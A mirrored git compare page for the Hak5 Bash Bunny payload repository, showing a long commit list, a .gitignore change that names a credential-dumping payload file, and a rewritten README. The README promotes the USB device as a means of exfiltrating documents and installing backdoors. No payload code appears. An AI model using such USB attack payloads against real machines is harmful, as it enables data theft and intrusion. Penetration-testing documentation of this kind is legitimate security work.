mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Compare commits
630 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
d4b03e729b | ||
|
|
9ae44f7c52 | ||
|
|
2aa1c19c33 | ||
|
|
5c7d23d393 | ||
|
|
6f7196803d | ||
|
|
1871ceb8e6 | ||
|
|
8cb9f0be03 | ||
|
|
e12e34c7b6 | ||
|
|
d01a7fe737 | ||
|
|
9bc2a0312d | ||
|
|
f7cf46fd95 | ||
|
|
774cc77212 | ||
|
|
5da19abe97 | ||
|
|
b1cf7e8ef4 | ||
|
|
9bcb7f9240 | ||
|
|
bf149a783b | ||
|
|
bc36c76444 | ||
|
|
6a260cfd4b | ||
|
|
8d901a02a8 | ||
|
|
14fa7c490e | ||
|
|
2559d728b1 | ||
|
|
257081013d | ||
|
|
e6c3876429 | ||
|
|
0e51172697 | ||
|
|
5ce34d6819 | ||
|
|
a57046358b | ||
|
|
36f116eed7 | ||
|
|
798cf7e463 | ||
|
|
70eac91d25 | ||
|
|
e9a0764001 | ||
|
|
1c2199298a | ||
|
|
50e3d0639f | ||
|
|
c1b03dacf7 | ||
|
|
19b4ff63f0 | ||
|
|
94c3342302 | ||
|
|
db2345c35b | ||
|
|
00713d6b7f | ||
|
|
fb77be9253 | ||
|
|
32e41527fb | ||
|
|
9aac0c1b74 | ||
|
|
fddae91cc5 | ||
|
|
8cb5a36a68 | ||
|
|
c9ecb7c42b | ||
|
|
94b43bf164 | ||
|
|
8c2b59bfba | ||
|
|
69c31ff1e8 | ||
|
|
e43de0efbd | ||
|
|
fd26d8be09 | ||
|
|
27ad6acfe2 | ||
|
|
a072c2cf59 | ||
|
|
15cc8b08bf | ||
|
|
aa16c0f822 | ||
|
|
c757f1d274 | ||
|
|
92e37f98f8 | ||
|
|
5b4693a27a | ||
|
|
b8ab07fd33 | ||
|
|
f2eb8d8606 | ||
|
|
678359b7c7 | ||
|
|
1740699edc | ||
|
|
495b51fa81 | ||
|
|
3a3aa7dda8 | ||
|
|
12bf4c9a22 | ||
|
|
5574b26649 | ||
|
|
88e3bbf524 | ||
|
|
98bfe07603 | ||
|
|
f729050548 | ||
|
|
2c9b668bfa | ||
|
|
5ec93761fd | ||
|
|
dff31d6a6a | ||
|
|
3f21e4d7fa | ||
|
|
5cfae30936 | ||
|
|
0750db3a35 | ||
|
|
491e467ca0 | ||
|
|
971a981c9f | ||
|
|
133f6d94aa | ||
|
|
856579039a | ||
|
|
0e8dc65a3b | ||
|
|
37a4d9b42e | ||
|
|
0279a82f4b | ||
|
|
f7d2a5879c | ||
|
|
7263f81135 | ||
|
|
38e84fa604 | ||
|
|
4da1333ab9 | ||
|
|
e2b0e495b3 | ||
|
|
b4ba117e41 | ||
|
|
8ffed622f0 | ||
|
|
3443b46fcc | ||
|
|
ec2f60c6aa | ||
|
|
e140b88873 | ||
|
|
6e89ba5bcc | ||
|
|
851364d438 | ||
|
|
a66ba8610f | ||
|
|
f7ba3d36d9 | ||
|
|
bb1f296d81 | ||
|
|
67a933a14b | ||
|
|
cb16ca918d | ||
|
|
68f265cac3 | ||
|
|
e6425f7dae | ||
|
|
1d7b83cdcc | ||
|
|
9bb1cb816f | ||
|
|
1c166e2343 | ||
|
|
ac2925419c | ||
|
|
2f1545eb35 | ||
|
|
04b4f794b7 | ||
|
|
cad78b52f2 | ||
|
|
e23e35a831 | ||
|
|
c8c3434502 | ||
|
|
48bf5abbbd | ||
|
|
dbd741a769 | ||
|
|
ea3d9d1e0f | ||
|
|
1c659bd4d4 | ||
|
|
da4753f6b1 | ||
|
|
622b820460 | ||
|
|
906a34358f | ||
|
|
91da428d08 | ||
|
|
4abf7feafa | ||
|
|
0189ae0fa8 | ||
|
|
3d9d1f8c00 | ||
|
|
7bfca60e72 | ||
|
|
9eda9728d0 | ||
|
|
b0ebf99aad | ||
|
|
08ca726b1e | ||
|
|
dad8de62fd | ||
|
|
d7044ced57 | ||
|
|
528affae1b | ||
|
|
1355217bd2 | ||
|
|
a25109c0e6 | ||
|
|
53c24e2716 | ||
|
|
5a7da24f95 | ||
|
|
f58f965204 | ||
|
|
f17d5da6d7 | ||
|
|
39bb39c562 | ||
|
|
1e9f8f9bee | ||
|
|
eec8108fb1 | ||
|
|
d8445f0b5b | ||
|
|
2266a9ddf6 | ||
|
|
d237d080e6 | ||
|
|
d68298eaa3 | ||
|
|
858bb2df2c | ||
|
|
41ca6270d9 | ||
|
|
4562a01a03 | ||
|
|
385ccbcd3f | ||
|
|
519b453791 | ||
|
|
8dba72cedd | ||
|
|
e8e2103c36 | ||
|
|
cf6452f5fc | ||
|
|
5dba64108f | ||
|
|
afd456627d | ||
|
|
0f3b7db81d | ||
|
|
fa0c413458 | ||
|
|
c2dc211ad8 | ||
|
|
afc3ac3478 | ||
|
|
eab131c783 | ||
|
|
a035d268c4 | ||
|
|
a67650031f | ||
|
|
427150a0dc | ||
|
|
0c39fffbf2 | ||
|
|
9494ab8d2e | ||
|
|
a991cd7af4 | ||
|
|
cad1abe00b | ||
|
|
caafcfb103 | ||
|
|
e74796ae1e | ||
|
|
962477433c | ||
|
|
b110693304 | ||
|
|
3ee453979d | ||
|
|
ab146c05d2 | ||
|
|
0703fffedf | ||
|
|
92e76d35fc | ||
|
|
85ecdd5889 | ||
|
|
eda34bd6bf | ||
|
|
1977d49f8e | ||
|
|
e3b3bf2121 | ||
|
|
f8cdc333e7 | ||
|
|
0e6968eb90 | ||
|
|
39fb59e9e9 | ||
|
|
8f19915a5f | ||
|
|
322cf4f7c1 | ||
|
|
5a67438f87 | ||
|
|
7892015c02 | ||
|
|
1b76be74ee | ||
|
|
a08e9b382d | ||
|
|
fa5dae9b11 | ||
|
|
5a15fac2f0 | ||
|
|
3e608cdd3d | ||
|
|
6d4455d239 | ||
|
|
c9dafb479f | ||
|
|
b813f1b196 | ||
|
|
b5bd4487b1 | ||
|
|
d328ab9db3 | ||
|
|
c2325d0a36 | ||
|
|
5738de5e9e | ||
|
|
7169158bb8 | ||
|
|
f864ad8323 | ||
|
|
8e322706bc | ||
|
|
b10a644277 | ||
|
|
2aa4910d0c | ||
|
|
a59fbe93c7 | ||
|
|
38bbd9ac7e | ||
|
|
600c65bf40 | ||
|
|
0bc2dad2f6 | ||
|
|
ca22cb3c37 | ||
|
|
cae94215c7 | ||
|
|
7cd924d77b | ||
|
|
d7c97aabe8 | ||
|
|
8185b97046 | ||
|
|
c391cd7c76 | ||
|
|
7d8994f7ac | ||
|
|
1a03a65020 | ||
|
|
5c29c9e5a5 | ||
|
|
37864eeff0 | ||
|
|
a8db5fd948 | ||
|
|
63fe005ddc | ||
|
|
614d313690 | ||
|
|
89dbe3f9ba | ||
|
|
56a74583a4 | ||
|
|
d56f4fd788 | ||
|
|
980debd8c0 | ||
|
|
80573a03ab | ||
|
|
d5f9923b2a | ||
|
|
49c8edf636 | ||
|
|
145ffc36f6 | ||
|
|
791cc4e1aa | ||
|
|
dfe52e6a5c | ||
|
|
22b39a2469 | ||
|
|
44975914d5 | ||
|
|
8e73e0248e | ||
|
|
71651b3f7b | ||
|
|
fd56992d11 | ||
|
|
2795d3096b | ||
|
|
86c1523a77 | ||
|
|
eb5600aeab | ||
|
|
b59823da1e | ||
|
|
c00d27240b | ||
|
|
fd74db9f60 | ||
|
|
cd5cdc1470 | ||
|
|
f12c486e12 | ||
|
|
3f41494153 | ||
|
|
1eef8dc006 | ||
|
|
797cf561d5 | ||
|
|
bd4ec90d04 | ||
|
|
0c82f52167 | ||
|
|
45e4bd1d38 | ||
|
|
0829d88f02 | ||
|
|
5a0e445023 | ||
|
|
4e2593beb4 | ||
|
|
7917c1b60d | ||
|
|
ed7872815d | ||
|
|
773073a057 | ||
|
|
7ee6003cb7 | ||
|
|
f0edfaf53c | ||
|
|
e11f9281cb | ||
|
|
614b70bb8f | ||
|
|
46d069c0a9 | ||
|
|
55d34722fd | ||
|
|
ed07188c3a | ||
|
|
c93463ccf6 | ||
|
|
d5c1f5d037 | ||
|
|
a91c2b80d0 | ||
|
|
0fccb70651 | ||
|
|
afee861549 | ||
|
|
564be0e217 | ||
|
|
82874a3e87 | ||
|
|
c56bb8791f | ||
|
|
7bd90b7308 | ||
|
|
53e4bdfef7 | ||
|
|
8f2f2f94f5 | ||
|
|
b58284adaa | ||
|
|
7f3972b88a | ||
|
|
6a0d5e83fd | ||
|
|
fbb563fd31 | ||
|
|
b6d43475c3 | ||
|
|
3ecad65a86 | ||
|
|
99a6ff18e5 | ||
|
|
8f04d1cdc9 | ||
|
|
92970ad6ff | ||
|
|
946879ae90 | ||
|
|
6bacea8bc8 | ||
|
|
bc281bcfdc | ||
|
|
09ab811f9c | ||
|
|
2e297ba861 | ||
|
|
a4141f7312 | ||
|
|
0ce6ccbedf | ||
|
|
7790d6dd1a | ||
|
|
f03f67be29 | ||
|
|
2785fbc4db | ||
|
|
fa06629d0b | ||
|
|
a047694d6b | ||
|
|
54a1f45ae2 | ||
|
|
effbd69614 | ||
|
|
2fdb38a3b4 | ||
|
|
ed25a7bfb4 | ||
|
|
db8fdc67f4 | ||
|
|
ba801201a7 | ||
|
|
a0ee4512b3 | ||
|
|
b86412afbd | ||
|
|
0d51a41aeb | ||
|
|
a5d11747cf | ||
|
|
3184c229c7 | ||
|
|
0f86f0ee24 | ||
|
|
e91c3b46eb | ||
|
|
277db7ad36 | ||
|
|
e0e0be1612 | ||
|
|
244dbec1eb | ||
|
|
387a7fea51 | ||
|
|
003ee1b9e7 | ||
|
|
83c38586b4 | ||
|
|
bbab037efb | ||
|
|
5eaf7d9dc7 | ||
|
|
0816151ebe | ||
|
|
ab466f52e5 | ||
|
|
2549d53373 | ||
|
|
1eb60b48e7 | ||
|
|
605ce41662 | ||
|
|
3849dd78b3 | ||
|
|
75f1a54282 | ||
|
|
1b8b6048f5 | ||
|
|
96cfd80035 | ||
|
|
c06fd4aa80 | ||
|
|
5e95ba3d40 | ||
|
|
287faf1f1e | ||
|
|
4f57e587a1 | ||
|
|
2b489f864c | ||
|
|
199c03cd85 | ||
|
|
bedcd433b7 | ||
|
|
fab1466896 | ||
|
|
f5292aa8ce | ||
|
|
95e1d22dee | ||
|
|
4c1c8d47cd | ||
|
|
50712f5c00 | ||
|
|
8f28d0ab0e | ||
|
|
77bf57308f | ||
|
|
b64503fe23 | ||
|
|
2e096c88f6 | ||
|
|
3e12c55d9f | ||
|
|
953f36ab50 | ||
|
|
d4e77cb241 | ||
|
|
7308488961 | ||
|
|
b71cf71651 | ||
|
|
496ab3ea23 | ||
|
|
9a8d6113a0 | ||
|
|
2ce8e8f034 | ||
|
|
979bdbc179 | ||
|
|
c19b9e56f6 | ||
|
|
712ebe762c | ||
|
|
27b1cd003e | ||
|
|
d9bdd824f1 | ||
|
|
b5fd8b50fc | ||
|
|
39fd0e838c | ||
|
|
e1700bdc91 | ||
|
|
8a7606aa0a | ||
|
|
5d4367787f | ||
|
|
49f7018bf3 | ||
|
|
73bf1c0c48 | ||
|
|
bb601883ef | ||
|
|
9e54726597 | ||
|
|
0414f0cfc7 | ||
|
|
72d424232a | ||
|
|
567040f9e7 | ||
|
|
91a280d62d | ||
|
|
60f9b361f3 | ||
|
|
f019d862cd | ||
|
|
12641377aa | ||
|
|
82592d435d | ||
|
|
54505507b9 | ||
|
|
97ef0d9173 | ||
|
|
863a47d90f | ||
|
|
da3c27ddea | ||
|
|
3fc0d9c857 | ||
|
|
dc885ce85c | ||
|
|
86c989f9a0 | ||
|
|
78eb6e3828 | ||
|
|
43b27d6079 | ||
|
|
a74596db96 | ||
|
|
d00bedd4d6 | ||
|
|
7916247ac0 | ||
|
|
ee97a0820d | ||
|
|
4627e1795b | ||
|
|
e79e39f95d | ||
|
|
4f46f9acfa | ||
|
|
205e744f25 | ||
|
|
80c724ad99 | ||
|
|
702deda619 | ||
|
|
8fa093b67e | ||
|
|
ee8aa1e66e | ||
|
|
904e0de1e1 | ||
|
|
b621491cc9 | ||
|
|
c652e2e131 | ||
|
|
3fb08e01ae | ||
|
|
605b7f1cab | ||
|
|
9fdacee185 | ||
|
|
9b86d8c991 | ||
|
|
1b042f6f2d | ||
|
|
1efd6a1116 | ||
|
|
4f6cd4b54d | ||
|
|
49dff6e659 | ||
|
|
9c55288403 | ||
|
|
66bc18cbe2 | ||
|
|
a61b1e603e | ||
|
|
785e5d2a75 | ||
|
|
babdc72743 | ||
|
|
efb5f63ad8 | ||
|
|
73ca91c3ba | ||
|
|
829a4db6b2 | ||
|
|
8cd8d859cd | ||
|
|
7a0d036b74 | ||
|
|
6375315a33 | ||
|
|
27d63ad5a5 | ||
|
|
e9916c88aa | ||
|
|
5b234069f0 | ||
|
|
3904f165d9 | ||
|
|
b8a329232a | ||
|
|
3840f5330b | ||
|
|
fc0fa47dcb | ||
|
|
6e0955fb2b | ||
|
|
5ccaa5562e | ||
|
|
5548c0b1cd | ||
|
|
3e3979221f | ||
|
|
faa24a329d | ||
|
|
d8ba87b488 | ||
|
|
04d19c4c94 | ||
|
|
8c13b961a3 | ||
|
|
7103031e6e | ||
|
|
27332a9f14 | ||
|
|
5d608972bc | ||
|
|
68621324d2 | ||
|
|
da6251df9f | ||
|
|
f1bf173d22 | ||
|
|
2c41f79fb6 | ||
|
|
e8ab62c9e8 | ||
|
|
ffce9e1931 | ||
|
|
90ad580485 | ||
|
|
4ac760772a | ||
|
|
5bc8160946 | ||
|
|
e98de70531 | ||
|
|
d67b95a220 | ||
|
|
d36f90f26c | ||
|
|
e889c414d5 | ||
|
|
d387f4e185 | ||
|
|
08a71de1d8 | ||
|
|
81dd9531bf | ||
|
|
9a6d515add | ||
|
|
947b08fc0f | ||
|
|
db87d0dc02 | ||
|
|
e2f848c6b0 | ||
|
|
81317d83b1 | ||
|
|
066b7846da | ||
|
|
938fe29c94 | ||
|
|
e82fb6166b | ||
|
|
f9aadb0a4d | ||
|
|
00b2ea8aa9 | ||
|
|
83f8d9cb43 | ||
|
|
0b9f7c0b47 | ||
|
|
b6af89dbdc | ||
|
|
2f23f34e6a | ||
|
|
d3727bd899 | ||
|
|
dabde35526 | ||
|
|
516df5d36c | ||
|
|
8a9437ae6e | ||
|
|
aec718806e | ||
|
|
8dd4797e5d | ||
|
|
3980bab638 | ||
|
|
6ee12332e5 | ||
|
|
0a407d0348 | ||
|
|
0068cfccd5 | ||
|
|
072c659943 | ||
|
|
92f1be3a52 | ||
|
|
b3537e7a65 | ||
|
|
d9d741e828 | ||
|
|
0973bf25ec | ||
|
|
fcb15af701 | ||
|
|
ddffe360a4 | ||
|
|
bb2c9c5bfd | ||
|
|
4778effde3 | ||
|
|
0ac9056917 | ||
|
|
fcac3b6d29 | ||
|
|
031a47b0d2 | ||
|
|
d11515bf59 | ||
|
|
36e34feac4 | ||
|
|
dba779b304 | ||
|
|
c282540f52 | ||
|
|
f171837db2 | ||
|
|
ca22f20b53 | ||
|
|
d22c2481a0 | ||
|
|
63c62a4871 | ||
|
|
81b4e060c8 | ||
|
|
a9b191045b | ||
|
|
bed7de2cd4 | ||
|
|
f573cb9b0b | ||
|
|
cda2430080 | ||
|
|
963c000ab9 | ||
|
|
6760498c27 | ||
|
|
16efe8b05b | ||
|
|
f9d4737fc0 | ||
|
|
7c8fbf0f41 | ||
|
|
230a677aa3 | ||
|
|
40a9afa7c4 | ||
|
|
470fd8a0ce | ||
|
|
32d7801f0e | ||
|
|
fa33a23a72 | ||
|
|
d31b0174b7 | ||
|
|
3ee2668f7e | ||
|
|
c52ce015de | ||
|
|
3ed306ef99 | ||
|
|
502576d7ed | ||
|
|
b1309229cc | ||
|
|
d341068548 | ||
|
|
55c7d4f706 | ||
|
|
0ee25f8d0d | ||
|
|
0273c87be2 | ||
|
|
fed24a87b4 | ||
|
|
9777ae0fee | ||
|
|
9687a8d830 | ||
|
|
d386f07d8e | ||
|
|
820576a103 | ||
|
|
e61d58d488 | ||
|
|
e0c355da0a | ||
|
|
e527ab16a5 | ||
|
|
aac697e89a | ||
|
|
ae176d1d14 | ||
|
|
33b71367c4 | ||
|
|
ee48a74dc6 | ||
|
|
4731402ad9 | ||
|
|
9fab25740d | ||
|
|
be78dafbfc | ||
|
|
989be5976a | ||
|
|
e984278d66 | ||
|
|
33ba79d692 | ||
|
|
65d652a15c | ||
|
|
a479964196 | ||
|
|
17e0b3d50c | ||
|
|
18e36a88b0 | ||
|
|
032061688d | ||
|
|
4df763c4a4 | ||
|
|
38a7460fe6 | ||
|
|
5f31a0be02 | ||
|
|
5f06649cd2 | ||
|
|
9ab8820cc5 | ||
|
|
b3b9f75200 | ||
|
|
9011db7fae | ||
|
|
6345354375 | ||
|
|
65ad5f6e89 | ||
|
|
920ff7fa67 | ||
|
|
5c764849f3 | ||
|
|
afdafb27d6 | ||
|
|
821105a6a3 | ||
|
|
81e6d536dd | ||
|
|
31ae33e78a | ||
|
|
b37aed0edc | ||
|
|
7f902403d4 | ||
|
|
a998f5c86c | ||
|
|
b644446f40 | ||
|
|
940dc09043 | ||
|
|
650772e9e4 | ||
|
|
d978800874 | ||
|
|
f8a442e66d | ||
|
|
6fa5887aae | ||
|
|
fae8746466 | ||
|
|
08c24c4389 | ||
|
|
53cf608b7f | ||
|
|
a48d9e2a61 | ||
|
|
00cee07ec0 | ||
|
|
e0abae7179 | ||
|
|
3a1b26e9c4 | ||
|
|
7097f442d3 | ||
|
|
dbae32c86d | ||
|
|
69cd48ee05 | ||
|
|
d65380bd94 | ||
|
|
f97b75983d | ||
|
|
2c49f6c09b | ||
|
|
98f6231faa | ||
|
|
fc0b43a403 | ||
|
|
f8c2edc325 | ||
|
|
e866ad438b | ||
|
|
763639b305 | ||
|
|
060d5744b0 | ||
|
|
c58e10dcab | ||
|
|
b894aa5842 | ||
|
|
5a77792c1d | ||
|
|
91c7c2276f | ||
|
|
c0ab8d3e88 | ||
|
|
31468c0e63 | ||
|
|
c30c99e668 | ||
|
|
06d36975d1 | ||
|
|
99e6b63f42 | ||
|
|
77b1a4e123 | ||
|
|
0f4129b124 | ||
|
|
01dd281e4f | ||
|
|
ddcd785deb | ||
|
|
cb706bcacc | ||
|
|
b82ccd12b1 | ||
|
|
61793e6f0b | ||
|
|
761dd0e433 | ||
|
|
3c2dd4ac1e | ||
|
|
c8b892badb | ||
|
|
6a9134d84b | ||
|
|
691f7e5bc9 | ||
|
|
113e35c736 | ||
|
|
80d622e16e | ||
|
|
0f83db10f5 | ||
|
|
fd0a0d0f6f | ||
|
|
a487d0a5db | ||
|
|
9c527c29c4 | ||
|
|
9eed215260 | ||
|
|
941180d59a | ||
|
|
bf063c1219 | ||
|
|
6ea0d43662 | ||
|
|
4dbc20f972 | ||
|
|
dd2013ef9d | ||
|
|
7f44c67c17 | ||
|
|
9fe8bddb49 | ||
|
|
c0743ccd31 | ||
|
|
2ee6e16a2f | ||
|
|
b22dd031b8 | ||
|
|
abfea1f683 | ||
|
|
8cad8b4e2a | ||
|
|
ea483975fd | ||
|
|
c10a388f8c | ||
|
|
f7c7c55f26 | ||
|
|
92efc2e097 | ||
|
|
cc537b1622 | ||
|
|
c8447375ea | ||
|
|
a1471e3a76 | ||
|
|
7368fc9b19 | ||
|
|
84f07261ba | ||
|
|
0635da0933 | ||
|
|
ef456ab581 | ||
|
|
92e2ed509f | ||
|
|
2c21fa6248 | ||
|
|
ac1c6020f9 | ||
|
|
f8614a3c1a |
1
.gitignore
vendored
1
.gitignore
vendored
@@ -1,3 +1,4 @@
|
||||
.DS_Store
|
||||
/.project
|
||||
/payloads/library/DumpCreds_2.0/PS/Invoke-M1m1d0gz.ps1
|
||||
bunny_connecter_config.txt
|
||||
|
||||
294
README.md
294
README.md
@@ -1,8 +1,290 @@
|
||||
# Payload Library for the Bash Bunny by Hak5
|
||||
# Payload Library for the [Bash Bunny](https://shop.hak5.org/products/bash-bunny) by [Hak5](https://hak5.org)
|
||||
|
||||

|
||||
This repository contains payloads and extensions for the Hak5 Bash Bunny. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.
|
||||
|
||||
* [Purchase at HakShop.com](https://hakshop.com/products/bash-bunny "Purchase at HakShop.com")
|
||||
* [Documentation and Wiki](http://wiki.bashbunny.com/#!index.md "Documentation and Wiki")
|
||||
* [Bash Bunny Forums](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Bash Bunny Forums")
|
||||
* IRC: irc.hak5.org #BashBunny
|
||||
**Payloads here are written in official DuckyScript™ and Bash specifically for the Bash Bunny. Hak5 does NOT guarantee payload functionality.** <a href="#legal"><b>See Legal and Disclaimers</b></a>
|
||||
|
||||
<div align="center">
|
||||
<img src="https://img.shields.io/github/forks/hak5/bashbunny-payloads?style=for-the-badge"/>
|
||||
|
||||
<img src="https://img.shields.io/github/stars/hak5/bashbunny-payloads?style=for-the-badge"/>
|
||||
<br/>
|
||||
<img src="https://img.shields.io/github/commit-activity/y/hak5/bashbunny-payloads?style=for-the-badge">
|
||||
<img src="https://img.shields.io/github/contributors/hak5/bashbunny-payloads?style=for-the-badge">
|
||||
</div>
|
||||
<br/>
|
||||
<p align="center">
|
||||
<a href="https://payloadhub.com"><img src="https://cdn.shopify.com/s/files/1/0068/2142/files/payloadhub.png?v=1652474600"></a>
|
||||
<br/>
|
||||
<a href="https://payloadhub.com/blogs/payloads/tagged/bash-bunny">View Featured Bash Bunny Payloads and Leaderboard</a>
|
||||
<br/><i>Get your payload in front of thousands. Enter to win over $2,000 in prizes in the <a href="https://hak5.org/pages/payload-awards">Hak5 Payload Awards!</a></i>
|
||||
</p>
|
||||
|
||||
<div align="center">
|
||||
<a href="https://hak5.org/discord"><img src="https://img.shields.io/discord/506629366659153951?label=Hak5%20Discord&style=for-the-badge"></a>
|
||||
|
||||
<a href="https://youtube.com/hak5"><img src="https://img.shields.io/youtube/channel/views/UC3s0BtrBJpwNDaflRSoiieQ?label=YouTube%20Views&style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://youtube.com/hak5"><img src="https://img.shields.io/youtube/channel/subscribers/UC3s0BtrBJpwNDaflRSoiieQ?style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://twitter.com/hak5"><img src="https://img.shields.io/badge/follow-%40hak5-1DA1F2?logo=twitter&style=for-the-badge"/></a>
|
||||
|
||||
<a href="https://instagram.com/hak5gear"><img src="https://img.shields.io/badge/Instagram-E4405F?style=for-the-badge&logo=instagram&logoColor=white"/></a>
|
||||
<br/><br/>
|
||||
|
||||
</div>
|
||||
|
||||
|
||||
# Table of contents
|
||||
<details open>
|
||||
<ul>
|
||||
<li><a href="#about-the-bash-bunny">About the Bash Bunny</a></li>
|
||||
<li><a href="#build-your-payloads-with-payloadstudio">PayloadStudio (Editor + Compiler)</a></li>
|
||||
<li><b><a href="#contributing">Contributing Payloads</a></b></li>
|
||||
<li><a href="#legal"><b>Legal and Disclaimers</b></a></li>
|
||||
</ul>
|
||||
</details>
|
||||
|
||||
|
||||
## Shop
|
||||
- [Bash Bunny Mark II](https://shop.hak5.org/products/bash-bunny "Purchase the Bash Bunny")
|
||||
- [PayloadStudio Pro](https://hak5.org/products/payload-studio-pro "Purchase PayloadStudio Pro")
|
||||
- [Shop All Hak5 Tools](https://shop.hak5.org "Shop All Hak5 Tools")
|
||||
## Getting Started
|
||||
- [Build Payloads with PayloadStudio](#build-your-payloads-with-payloadstudio) | [Getting STARTED](https://docs.hak5.org/bash-bunny/beginner-guides/ "QUICK START GUIDE") | [Your First Payload](https://docs.hak5.org/bash-bunny/writing-payloads/payload-development-basics)
|
||||
## Documentation / Learn More
|
||||
- [Documentation](https://docs.hak5.org/bash-bunny/ "Documentation")
|
||||
|
||||
## Community
|
||||
*Got Questions? Need some help? Reach out:*
|
||||
- [Discord](https://hak5.org/discord/ "Discord") | [Forums](https://forums.hak5.org/forum/92-bash-bunny/ "Forums")
|
||||
|
||||
|
||||
## Additional Links
|
||||
<b> Follow the creators </b><br/>
|
||||
<p>
|
||||
<b>Korben's Socials</b><br/>
|
||||
<a href="https://twitter.com/notkorben"><img src="https://img.shields.io/twitter/follow/notkorben?style=social"/></a>
|
||||
<a href="https://instagram.com/hak5korben"><img src="https://img.shields.io/badge/Instagram-Follow%20@hak5korben-E1306C"/></a>
|
||||
<br/>
|
||||
<b>Darren's Socials</b><br/>
|
||||
<a href="https://twitter.com/hak5darren"><img src="https://img.shields.io/twitter/follow/hak5darren?style=social"/></a>
|
||||
<a href="https://instagram.com/hak5darren"><img src="https://img.shields.io/badge/Instagram-Follow%20@hak5darren-E1306C"/></a>
|
||||
</p>
|
||||
|
||||
<br/>
|
||||
<h1><a href="https://shop.hak5.org/products/bash-bunny">About the Bash Bunny</a></h1>
|
||||
|
||||
Linux machine in a USB. By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits.
|
||||
|
||||
|
||||
<b><div align="center">
|
||||
<br/>
|
||||
<br/><br/>
|
||||
</div></b>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://www.youtube.com/watch?v=-UmvZdDxCiI">
|
||||
<img src="https://downloads.hak5.org/assets/images/productphotos/bash_bunny_mk2.png" width="500"/>
|
||||
</a>
|
||||
<br/>
|
||||
</p>
|
||||
|
||||
|
||||
<p align="center">
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon3_160x160.png?v=1624506236" alt="image">
|
||||
</p>
|
||||
|
||||
## <div align="center">ADVANCED ATTACKS </div>
|
||||
|
||||
For the sake of convenience, computers trust a number of devices. Flash drives, Ethernet adapters, serial devices and keyboards to name a few. These have become mainstays of modern computing. Each has their own unique attack vectors. When combined? The possibilities are limitless. The Bash Bunny is all of these things, alone – or in combination – and more!
|
||||
|
||||
<p align="center">
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon2_160x160.png?v=1624506369" alt="image">
|
||||
</p>
|
||||
|
||||
## <div align="center">SIMPLE PAYLOADS </div>
|
||||
|
||||
Each attack, or payload, is written in a simple Ducky Script™ language consisting of text files. This repository is home to a growing library of community developed payloads. Staying up to date with all of the latest attacks is just a matter of downloading files from git. Then loading ’em onto the Bash Bunny just as you would any ordinary flash drive.
|
||||
|
||||
<p align="center">
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/bb_icon1_160x160.png?v=1624506437" alt="image">
|
||||
</p>
|
||||
|
||||
## <div align="center">SIMPLE POWERFUL HARDWARE </div>
|
||||
|
||||
It's a full featured Linux box that'll run your favorite tools even faster now thanks to the optimized quad-core CPU, desktop-class SSD and doubled RAM. Choose and monitor payloads with the selection switch and RGB LED. Access an unlocked root terminal via dedicated Serial console. Exfiltrate gigs of loot via MicroSD. Even remotely trigger or geofence payloads via Bluetooth.
|
||||
|
||||
|
||||
<h1><a href="https://payloadstudio.hak5.org">Build your payloads with PayloadStudio</a></h1>
|
||||
<p align="center">
|
||||
Take your DuckyScript™ payloads to the next level with this full-featured,<b> web-based (entirely client side) </b> development environment.
|
||||
<br/>
|
||||
<a href="https://payloadstudio.hak5.org"><img width="500px" src="https://cdn.shopify.com/s/files/1/0068/2142/products/payload-studio-icon_2000x.png"></a>
|
||||
<br/>
|
||||
<i>Payload studio features all of the conveniences of a modern IDE, right from your browser. From syntax highlighting and auto-completion to live error-checking and repo synchronization - building payloads for Hak5 hotplug tools has never been easier!
|
||||
<br/><br/>
|
||||
Supports your favorite Hak5 gear - USB Rubber Ducky, Bash Bunny, Key Croc, Shark Jack, Packet Squirrel & LAN Turtle!
|
||||
<br/><br/></i><br/>
|
||||
<a href="https://hak5.org/products/payload-studio-pro">Become a PayloadStudio Pro</a> and <b> Unleash your hacking creativity! </b>
|
||||
<br/>
|
||||
OR
|
||||
<br/>
|
||||
<a href="https://payloadstudio.hak5.org/community/"> Try Community Edition FREE</a>
|
||||
<br/><br/>
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/themes1_1_600x.gif?v=1659642557">
|
||||
<br/>
|
||||
<i> Payload Studio Themes Preview GIF </i>
|
||||
<br/><br/>
|
||||
<img src="https://cdn.shopify.com/s/files/1/0068/2142/files/AUTOCOMPLETE3_600x.gif?v=1659640513">
|
||||
<br/>
|
||||
<i> Payload Studio Autocomplete Preview GIF </i>
|
||||
</p>
|
||||
|
||||
|
||||
## Disclaimer
|
||||
Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.
|
||||
|
||||
<h1><a href='https://payloadhub.com'>Contributing</a></h1>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://payloadhub.com"><img src="https://cdn.shopify.com/s/files/1/0068/2142/files/payloadhub.png?v=1652474600"></a>
|
||||
<br/>
|
||||
<a href="https://payloadhub.com">View Featured Payloads and Leaderboard </a>
|
||||
</p>
|
||||
|
||||
# Please adhere to the following best practices and style guides when submitting a payload.
|
||||
|
||||
Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.
|
||||
|
||||
Please include all resources required for the payload to run. If needed, provide a README.md in the root of your payload's directory to explain things such as intended use, required configurations, or anything that will not easily fit in the comments of the payload.txt itself. Please make sure that your payload is tested, and free of errors. If your payload contains (or is based off of) the work of other's please make sure to cite their work giving proper credit.
|
||||
|
||||
|
||||
### Purely Destructive payloads will not be accepted. No, it's not "just a prank".
|
||||
Subject to change. Please ensure any submissions meet the [latest version](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md) of these standards before submitting a Pull Request.
|
||||
|
||||
|
||||
|
||||
## Naming Conventions
|
||||
